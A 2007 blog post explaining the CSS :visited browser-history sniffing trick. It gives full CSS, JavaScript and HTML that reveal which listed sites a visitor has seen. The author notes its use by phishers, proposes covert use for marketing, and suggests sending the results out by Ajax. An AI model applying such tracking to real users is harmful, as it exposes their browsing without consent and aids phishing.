The shared thoughts, ideas and musings of a web developer in Dublin

Asking for your user’s browser history

Posted: December 3rd, 2007 | Author: Ben | Filed under: Uncategorized | No Comments »

This is a trick vulnerability I learnt about from a talk I went to by Rasmus Lerdorf called ‘Exploring The Broken Web’. He took delegates on a 30 minute whirlwind tour of security vulnurabilities on the internet, specifically what can be done with XSS combined with a bit of social engineering.

He only briefly skimmed on an area that interested me. He exposed how a developer can check a user’s browser history, by just asking for it.

The trick is to use a small (and very simple) JavaScript code along with some CSS to find out which websites a user has visited from a list you provide.

Rasmus mentioned the script as something of use to phishers (they can find out which banks you bank online with and send you the appropriate phishing emails). I saw a less immoral use for it (although I won’t deny it’s still immoral): purely for marketing statistics. If I had a site selling t-shirts, like www.bensfunkytshirts.com I could use this script to find out if my visitors had also been to threadless, bustedtees and designbyhumans – or any other site.

Here’s the CSS:

#links a {width: 0px; overflow: hidden;}
#links div {margin: 0; padding: 0;}
a {position: absolute;}
a:visited {left: 1px;}

Here’s the JavaScript:

onload =function() {
var links =document.getElementsByTagName('a');
var visited =new Array();
for(i =0; i<links.length; i++) {
if(links[i].offsetLeft==1) visited.push(links[i].id);
}

//reveal on page the results
for(i =0; i<visited.length; i++) document.write('You have been to ' + visited[i] + '<br />');
}
</script>

Finally, here’s the HTML:

<div id="links">
<div><a id="Yahoo" href="http://www.yahoo.com/">.</a></div>
<div><a id="Google" href="http://www.google.com/">.</a></div>
<div><a id="BBC-News" href="http://news.bbc.co.uk/">.</a></div>
<div><a id="SlashDot" href="http://slashdot.org/">.</a></div>
</div>

I’ve put an example of the script working up here:
http://www.hostengage.com.au/dev/historyInquisition/

If I were to use a simple piece of Ajax, or to stick the sites I know you’ve visited into a simple hidden form, I could easily learn far more about your browsing habits than you would want me to know.

Update (2008-06-12)
I’ve finally got round to putting together an example of this working.

Share and Enjoy:
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google Bookmarks

Leave a Reply